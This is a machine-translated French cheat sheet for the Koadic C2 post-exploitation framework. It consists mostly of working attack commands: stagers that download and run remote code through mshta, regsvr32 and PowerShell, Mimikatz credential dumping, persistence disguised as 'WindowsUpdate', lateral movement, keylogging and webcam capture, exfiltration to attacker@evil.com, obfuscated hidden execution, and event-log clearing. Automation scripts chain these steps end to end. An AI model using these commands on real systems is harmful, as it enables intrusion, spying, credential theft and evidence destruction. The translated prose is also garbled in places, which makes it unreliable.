Feuille de chaleur cadre Koadic C2
Aperçu général
Koadic est un cadre Windows post-exploitation qui exploite les objets COM (Component Object Model) pour les opérations de commande et de contrôle. Construit en Python, Koadic se concentre sur les techniques living-off-the-land, utilisant des composants Windows légitimes et l'exécution JavaScript pour maintenir la persistance et éviter la détection tout en fournissant des capacités post-exploitation complètes.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser contre toute cible.
Installation
Préalables
# Install Python 3.6+ and pip
sudo apt update
sudo apt install -y python3 python3-pip git
# Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
# Verify Python version
python3 --version
Installation depuis GitHub
# Clone Koadic repository
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
# Install requirements
pip3 install -r requirements.txt
# Make executable
chmod +x koadic
```_
### Installation Docker
```bash
# Clone repository
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
# Build Docker image
docker build -t koadic .
# Run Koadic container
docker run -it --rm -p 9999:9999 koadic
# Run with persistent data
docker run -it --rm -p 9999:9999 -v $(pwd)/data:/app/data koadic
```_
### Installation de Kali Linux
```bash
# Install from Kali repositories
sudo apt update
sudo apt install koadic
# Or install from source
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
Utilisation de base
Démarrage de Koadic
# Start Koadic
python3 koadic
# Start with specific interface
python3 koadic --ip 192.168.1.100
# Start with custom port
python3 koadic --port 8080
# Start in quiet mode
python3 koadic --quiet
Interface de ligne de commande
# Koadic command prompt
(koadic: sta/js/mshta)#
# Get help
help
# Show available modules
show
# Use a module
use [module_path]
# Set module options
set [option] [value]
# Execute module
run
# Background current session
background
Commandes de base
# List available stagers
show stagers
# List available implants
show implants
# List active zombies (compromised hosts)
zombies
# Interact with zombie
zombie [zombie_id]
# Kill zombie
zombie [zombie_id] kill
Mises en scène et implants
MSHTA Stager
# Use MSHTA stager
use stager/js/mshta
# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT sales
# Generate stager
run
# Generated command
mshta http://192.168.1.100:9999/sales
# Execute on target
mshta.exe http://192.168.1.100:9999/sales
Rundll32 Stager
# Use Rundll32 stager
use stager/js/rundll32_js
# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT update
# Generate stager
run
# Generated command
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.100:9999/update",false);h.Send();eval(h.ResponseText);window.close();
Regsvr32 Stager
# Use Regsvr32 stager
use stager/js/regsvr32
# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT api
# Generate stager
run
# Generated command
regsvr32 /s /n /u /i:http://192.168.1.100:9999/api scrobj.dll
WScript Stager
# Use WScript stager
use stager/js/wscript
# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT data
# Generate stager
run
# Generated command
wscript.exe //b //e:jscript \\192.168.1.100\share\payload.js
PowerShell Stager
# Use PowerShell stager
use stager/js/powershell
# Set options
set SRVHOST 192.168.1.100
set SRVPORT 9999
set ENDPOINT ps
# Generate stager
run
# Generated command
powershell.exe -exec bypass -window hidden -noni -nop -c "iex((new-object system.net.webclient).downloadstring('http://192.168.1.100:9999/ps'))"
Gestion des zombies
Commandes Zombie de base
# List all zombies
zombies
# Get zombie information
zombie [zombie_id] info
# Execute command on zombie
zombie [zombie_id] cmd "whoami"
# Execute PowerShell on zombie
zombie [zombie_id] shell "Get-Process"
# Kill zombie
zombie [zombie_id] kill
# Rename zombie
zombie [zombie_id] rename [new_name]
Interactions avec les zombies
# Interact with specific zombie
zombie [zombie_id]
# Once in zombie context
whoami # Current user
hostname # Computer name
pwd # Current directory
ls # List directory
cd [path] # Change directory
cat [file] # Read file
download [file] # Download file
upload [local] [remote] # Upload file
Opérations multizombies
# Execute command on all zombies
zombies cmd "systeminfo"
# Execute on specific zombies
zombies 1,3,5 cmd "whoami"
# Execute PowerShell on all zombies
zombies shell "Get-ComputerInfo"
# Kill all zombies
zombies kill
Modules d'implant
Informations sur le système
# Get system information
use implant/gather/enum_system
set ZOMBIE [zombie_id]
run
# Enumerate users
use implant/gather/enum_users
set ZOMBIE [zombie_id]
run
# Enumerate processes
use implant/gather/enum_process
set ZOMBIE [zombie_id]
run
# Enumerate services
use implant/gather/enum_services
set ZOMBIE [zombie_id]
run
Récolte crédible
# Dump credentials with Mimikatz
use implant/gather/mimikatz
set ZOMBIE [zombie_id]
set COMMAND sekurlsa::logonpasswords
run
# Dump SAM database
use implant/gather/hashdump
set ZOMBIE [zombie_id]
run
# Enumerate stored credentials
use implant/gather/enum_creds
set ZOMBIE [zombie_id]
run
# Browser credential extraction
use implant/gather/enum_chrome
set ZOMBIE [zombie_id]
run
Mécanismes de persistance
# Registry persistence
use implant/persist/registry
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set HIVE HKCU
set KEY "Software\Microsoft\Windows\CurrentVersion\Run"
set VALUE "WindowsUpdate"
run
# Scheduled task persistence
use implant/persist/schtasks
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set TASKNAME "SystemUpdate"
set TRIGGER "ONLOGON"
run
# Service persistence
use implant/persist/service
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set SERVICENAME "WindowsUpdateService"
run
# WMI persistence
use implant/persist/wmi
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
set FILTERNAME "ProcessFilter"
set CONSUMERNAME "ProcessConsumer"
run
Mouvement latéral
# WMI execution
use implant/lateral/wmi
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set USERNAME administrator
set PASSWORD password123
set COMMAND "whoami"
run
# PSExec execution
use implant/lateral/psexec
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set USERNAME admin
set PASSWORD pass123
set COMMAND "systeminfo"
run
# PowerShell remoting
use implant/lateral/winrm
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set USERNAME administrator
set PASSWORD password123
set COMMAND "Get-Process"
run
# SMB execution
use implant/lateral/smb
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
set SHARE C$
set USERNAME admin
set PASSWORD pass123
set COMMAND "dir"
run
Escalade des privilèges
# UAC bypass techniques
use implant/elevate/bypassuac_eventvwr
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
run
use implant/elevate/bypassuac_fodhelper
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
run
use implant/elevate/bypassuac_computerdefaults
set ZOMBIE [zombie_id]
set PAYLOAD [payload_path]
run
# Token manipulation
use implant/elevate/token_steal
set ZOMBIE [zombie_id]
set PID [target_pid]
run
# Service exploitation
use implant/elevate/service_unquoted
set ZOMBIE [zombie_id]
run
Opérations réseau
# Port scanning
use implant/scan/tcp
set ZOMBIE [zombie_id]
set RHOSTS 192.168.1.0/24
set RPORTS 80,443,22,3389
run
# Network discovery
use implant/gather/enum_network
set ZOMBIE [zombie_id]
run
# ARP scanning
use implant/scan/arp
set ZOMBIE [zombie_id]
set NETWORK 192.168.1.0/24
run
# SMB enumeration
use implant/gather/enum_shares
set ZOMBIE [zombie_id]
set TARGET 192.168.1.100
run
Opérations de fichiers
# File search
use implant/gather/file_search
set ZOMBIE [zombie_id]
set PATH C:\Users
set PATTERN *.docx
run
# Directory listing
use implant/gather/dir_list
set ZOMBIE [zombie_id]
set PATH C:\Users\Administrator\Documents
run
# File download
use implant/gather/download
set ZOMBIE [zombie_id]
set RPATH C:\Users\Administrator\Documents\sensitive.docx
set LPATH ./downloads/sensitive.docx
run
# File upload
use implant/manage/upload
set ZOMBIE [zombie_id]
set LPATH ./payloads/tool.exe
set RPATH C:\Windows\Temp\tool.exe
run
Caractéristiques avancées
Piment et tunnel
# SOCKS proxy
use implant/pivot/socks
set ZOMBIE [zombie_id]
set LPORT 1080
run
# Port forwarding
use implant/pivot/portfwd
set ZOMBIE [zombie_id]
set LPORT 8080
set RHOST 192.168.1.100
set RPORT 80
run
# Reverse port forwarding
use implant/pivot/rportfwd
set ZOMBIE [zombie_id]
set LPORT 3389
set RHOST 127.0.0.1
set RPORT 3389
run
Capture de clés et d'écran
# Start keylogger
use implant/gather/keylogger
set ZOMBIE [zombie_id]
set DURATION 300
run
# Screen capture
use implant/gather/screenshot
set ZOMBIE [zombie_id]
run
# Webcam capture
use implant/gather/webcam
set ZOMBIE [zombie_id]
run
# Audio recording
use implant/gather/microphone
set ZOMBIE [zombie_id]
set DURATION 60
run
Exfiltration des données
# HTTP exfiltration
use implant/exfil/http
set ZOMBIE [zombie_id]
set LPATH C:\Users\Administrator\Documents\data.zip
set URL http://192.168.1.100:8080/upload
run
# DNS exfiltration
use implant/exfil/dns
set ZOMBIE [zombie_id]
set LPATH C:\sensitive\data.txt
set DOMAIN exfil.example.com
run
# Email exfiltration
use implant/exfil/email
set ZOMBIE [zombie_id]
set LPATH C:\data\sensitive.docx
set SMTP smtp.gmail.com
set USERNAME user@gmail.com
set PASSWORD password123
set RECIPIENT attacker@evil.com
run
Automatisation et écriture
Python Automation Script
#!/usr/bin/env python3
# Koadic automation script
import time
import subprocess
import json
import os
class KoadicAutomation:
def __init__(self, koadic_path="./koadic"):
self.koadic_path = koadic_path
self.zombies = []
def execute_command(self, command):
"""Execute Koadic command"""
try:
result = subprocess.run([
"python3", self.koadic_path,
"-c", command
], capture_output=True, text=True, timeout=30)
return result.stdout
except subprocess.TimeoutExpired:
return "Command timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_listener(self, host="192.168.1.100", port=9999):
"""Setup MSHTA listener"""
commands = [
"use stager/js/mshta",
f"set SRVHOST \\\\{host\\\\}",
f"set SRVPORT \\\\{port\\\\}",
"set ENDPOINT sales",
"run"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(1)
print(f"[+] Listener setup complete")
print(f"[+] Execute on target: mshta http://\\\\{host\\\\}:\\\\{port\\\\}/sales")
def get_zombies(self):
"""Get list of active zombies"""
result = self.execute_command("zombies")
# Parse zombie list from output
# Implementation depends on output format
return self.zombies
def automated_recon(self, zombie_id):
"""Perform automated reconnaissance"""
modules = [
"implant/gather/enum_system",
"implant/gather/enum_users",
"implant/gather/enum_process",
"implant/gather/enum_services",
"implant/gather/enum_network"
]
for module in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}",
"run"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(2)
def credential_harvesting(self, zombie_id):
"""Harvest credentials from zombie"""
modules = [
("implant/gather/mimikatz", "sekurlsa::logonpasswords"),
("implant/gather/hashdump", ""),
("implant/gather/enum_creds", ""),
("implant/gather/enum_chrome", "")
]
for module, command in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
if command:
commands.append(f"set COMMAND \\\\{command\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(3)
def establish_persistence(self, zombie_id):
"""Establish persistence on zombie"""
persistence_modules = [
("implant/persist/registry", \\\\{
"HIVE": "HKCU",
"KEY": "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"VALUE": "WindowsUpdate",
"PAYLOAD": "C:\\Windows\\Temp\\update.exe"
\\\\}),
("implant/persist/schtasks", \\\\{
"TASKNAME": "SystemUpdate",
"TRIGGER": "ONLOGON",
"PAYLOAD": "C:\\Windows\\Temp\\update.exe"
\\\\})
]
for module, options in persistence_modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
for key, value in options.items():
commands.append(f"set \\\\{key\\\\} \\\\{value\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(2)
def lateral_movement(self, zombie_id, targets):
"""Perform lateral movement"""
for target in targets:
modules = [
("implant/lateral/wmi", \\\\{
"TARGET": target,
"USERNAME": "administrator",
"PASSWORD": "password123",
"COMMAND": "whoami"
\\\\}),
("implant/lateral/psexec", \\\\{
"TARGET": target,
"USERNAME": "admin",
"PASSWORD": "pass123",
"COMMAND": "systeminfo"
\\\\})
]
for module, options in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
for key, value in options.items():
commands.append(f"set \\\\{key\\\\} \\\\{value\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(3)
# Usage example
def main():
automation = KoadicAutomation()
# Setup listener
automation.setup_listener("192.168.1.100", 9999)
# Wait for zombies to connect
print("[+] Waiting for zombies to connect...")
time.sleep(60)
# Get active zombies
zombies = automation.get_zombies()
for zombie_id in zombies:
print(f"[+] Processing zombie: \\\\{zombie_id\\\\}")
# Perform reconnaissance
automation.automated_recon(zombie_id)
# Harvest credentials
automation.credential_harvesting(zombie_id)
# Establish persistence
automation.establish_persistence(zombie_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
automation.lateral_movement(zombie_id, targets)
if __name__ == "__main__":
main()
Automatisation PowerShell
# Koadic PowerShell automation script
function Invoke-KoadicAutomation \\\\{
param(
[string]$KoadicPath = "./koadic",
[string]$ListenerHost = "192.168.1.100",
[int]$ListenerPort = 9999
)
function Execute-KoadicCommand \\\\{
param([string]$Command)
try \\\\{
$result = & python3 $KoadicPath -c $Command 2>&1
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute command: $Command"
return $null
\\\\}
\\\\}
# Setup MSHTA listener
Write-Host "[+] Setting up MSHTA listener..."
$commands = @(
"use stager/js/mshta",
"set SRVHOST $ListenerHost",
"set SRVPORT $ListenerPort",
"set ENDPOINT sales",
"run"
)
foreach ($cmd in $commands) \\\\{
Write-Host "[+] Executing: $cmd"
Execute-KoadicCommand -Command $cmd
Start-Sleep -Seconds 1
\\\\}
Write-Host "[+] Listener setup complete"
Write-Host "[+] Execute on target: mshta http://$ListenerHost`:$ListenerPort/sales"
# Wait for zombies
Write-Host "[+] Waiting for zombies to connect..."
Start-Sleep -Seconds 60
# Get zombie list (simplified - would need proper parsing)
$zombieResult = Execute-KoadicCommand -Command "zombies"
# Process each zombie (example with zombie ID 0)
$zombieId = 0
Write-Host "[+] Processing zombie: $zombieId"
# Reconnaissance modules
$reconModules = @(
"implant/gather/enum_system",
"implant/gather/enum_users",
"implant/gather/enum_process",
"implant/gather/enum_services"
)
foreach ($module in $reconModules) \\{
Write-Host "[+] Running module: $module"
Execute-KoadicCommand -Command "use $module"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
Execute-KoadicCommand -Command "run"
Start-Sleep -Seconds 3
\\}
# Credential harvesting
Write-Host "[+] Harvesting credentials..."
$credModules = @(
@\\{Module = "implant/gather/mimikatz"; Command = "sekurlsa::logonpasswords"\\},
@\\{Module = "implant/gather/hashdump"; Command = ""\\},
@\\{Module = "implant/gather/enum_creds"; Command = ""\\}
)
foreach ($item in $credModules) \\{
Write-Host "[+] Running module: $($item.Module)"
Execute-KoadicCommand -Command "use $($item.Module)"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
if ($item.Command) \\{
Execute-KoadicCommand -Command "set COMMAND $($item.Command)"
\\}
Execute-KoadicCommand -Command "run"
Start-Sleep -Seconds 5
\\}
# Establish persistence
Write-Host "[+] Establishing persistence..."
Execute-KoadicCommand -Command "use implant/persist/registry"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
Execute-KoadicCommand -Command "set HIVE HKCU"
Execute-KoadicCommand -Command "set KEY Software\Microsoft\Windows\CurrentVersion\Run"
Execute-KoadicCommand -Command "set VALUE WindowsUpdate"
Execute-KoadicCommand -Command "set PAYLOAD C:\Windows\Temp\update.exe"
Execute-KoadicCommand -Command "run"
Write-Host "[+] Automation completed"
\\}
# Execute automation
Invoke-KoadicAutomation -ListenerHost "192.168.1.100" -ListenerPort 9999
Script d'automatisation de la masse
#!/bin/bash
# Koadic bash automation script
KOADIC_PATH="./koadic"
LISTENER_HOST="192.168.1.100"
LISTENER_PORT="9999"
# Function to execute Koadic commands
execute_koadic_command() \\{
local command="$1"
echo "[+] Executing: $command"
python3 "$KOADIC_PATH" -c "$command"
sleep 1
\\}
# Setup MSHTA listener
echo "[+] Setting up MSHTA listener..."
execute_koadic_command "use stager/js/mshta"
execute_koadic_command "set SRVHOST $LISTENER_HOST"
execute_koadic_command "set SRVPORT $LISTENER_PORT"
execute_koadic_command "set ENDPOINT sales"
execute_koadic_command "run"
echo "[+] Listener setup complete"
echo "[+] Execute on target: mshta http://$LISTENER_HOST:$LISTENER_PORT/sales"
# Wait for zombies
echo "[+] Waiting for zombies to connect..."
sleep 60
# Process zombie (example with zombie ID 0)
ZOMBIE_ID=0
echo "[+] Processing zombie: $ZOMBIE_ID"
# Reconnaissance
echo "[+] Performing reconnaissance..."
recon_modules=(
"implant/gather/enum_system"
"implant/gather/enum_users"
"implant/gather/enum_process"
"implant/gather/enum_services"
"implant/gather/enum_network"
)
for module in "$\\{recon_modules[@]\\}"; do
echo "[+] Running module: $module"
execute_koadic_command "use $module"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "run"
sleep 3
done
# Credential harvesting
echo "[+] Harvesting credentials..."
execute_koadic_command "use implant/gather/mimikatz"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "set COMMAND sekurlsa::logonpasswords"
execute_koadic_command "run"
sleep 5
execute_koadic_command "use implant/gather/hashdump"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "run"
sleep 5
# Establish persistence
echo "[+] Establishing persistence..."
execute_koadic_command "use implant/persist/registry"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "set HIVE HKCU"
execute_koadic_command "set KEY Software\\Microsoft\\Windows\\CurrentVersion\\Run"
execute_koadic_command "set VALUE WindowsUpdate"
execute_koadic_command "set PAYLOAD C:\\Windows\\Temp\\update.exe"
execute_koadic_command "run"
execute_koadic_command "use implant/persist/schtasks"
execute_koadic_command "set ZOMBIE $ZOMBIE_ID"
execute_koadic_command "set TASKNAME SystemUpdate"
execute_koadic_command "set TRIGGER ONLOGON"
execute_koadic_command "set PAYLOAD C:\\Windows\\Temp\\update.exe"
execute_koadic_command "run"
echo "[+] Automation completed"
Intégration avec d'autres outils
Intégration des métadonnées
# Use Koadic for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Koadic zombie
use implant/manage/upload
set ZOMBIE [zombie_id]
set LPATH ./meterpreter.exe
set RPATH C:\Windows\Temp\update.exe
run
# Execute Metasploit payload
zombie [zombie_id] cmd "C:\Windows\Temp\update.exe"
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Intégration de l'Empire
# Generate Empire stager
# Use Koadic for initial access, pivot to Empire
# From Koadic zombie
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute
Intégration de la grève du cobalt
# Beacon integration
# Generate Cobalt Strike beacon
# Use Koadic for initial access, pivot to Beacon
# From Koadic zombie
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Sécurité opérationnelle
Sécurité des communications
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Example HTTPS configuration
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Configure Koadic with SSL (if supported)
# Use reverse proxy with SSL termination
Obfuscation de la circulation
# Use legitimate Windows binaries
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated execution
mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"& \\{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100:9999/sales')\\}"""", 0, False")(window.close)
Anti-forensiques
# Clear event logs
zombie [zombie_id] cmd "wevtutil cl System"
zombie [zombie_id] cmd "wevtutil cl Security"
zombie [zombie_id] cmd "wevtutil cl Application"
# Clear PowerShell history
zombie [zombie_id] shell "Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
# Timestomping
zombie [zombie_id] shell "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Dépannage
Questions communes
# Zombie not connecting
1. Check firewall rules
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# Python dependency issues
pip3 install --upgrade -r requirements.txt
# Module execution failures
# Check zombie status
zombies
# Verify module options
show options
Mode de débogage
# Enable verbose logging
python3 koadic --verbose
# Check network connectivity
telnet 192.168.1.100 9999
# Test stager execution
mshta http://192.168.1.100:9999/sales
Meilleures pratiques
Planification opérationnelle
- ** Configuration préalable à l'engagement** : Configurer les astérisques et les auditeurs avant l'engagement
- Gestion des zombies: Utiliser des noms zombies descriptifs et organiser par réseau
- ** Protocoles de communication** : Établir des canaux de communication C2 sécurisés
- Gestion des données: Mettre en œuvre une collecte et un stockage sécurisés des données
- Procédures de nettoyage: Plan pour l'enlèvement des artefacts et le nettoyage des zombies
Considérations en matière de sécurité
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Zombie management
# Use unique zombie identifiers
# Implement zombie timeouts
# Regular zombie rotation
# Secure communication channels
Documentation et rapports
# Operation documentation
# Maintain zombie logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Ressources
- [Résistoire GitHub koadique] (LINK_5)
- [Documentation koadique] (LINK_5)
- [Vivre hors des Binaires de Terre] (LINK_5)
- [Cadre MITRE ATT&CK] (LINK_5)
- Opérations de l'équipe rouge SANS
*Cette feuille de triche fournit une référence complète pour l'utilisation du cadre Koadic C2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer les opérations de l'équipe rouge ou les tests de pénétration. *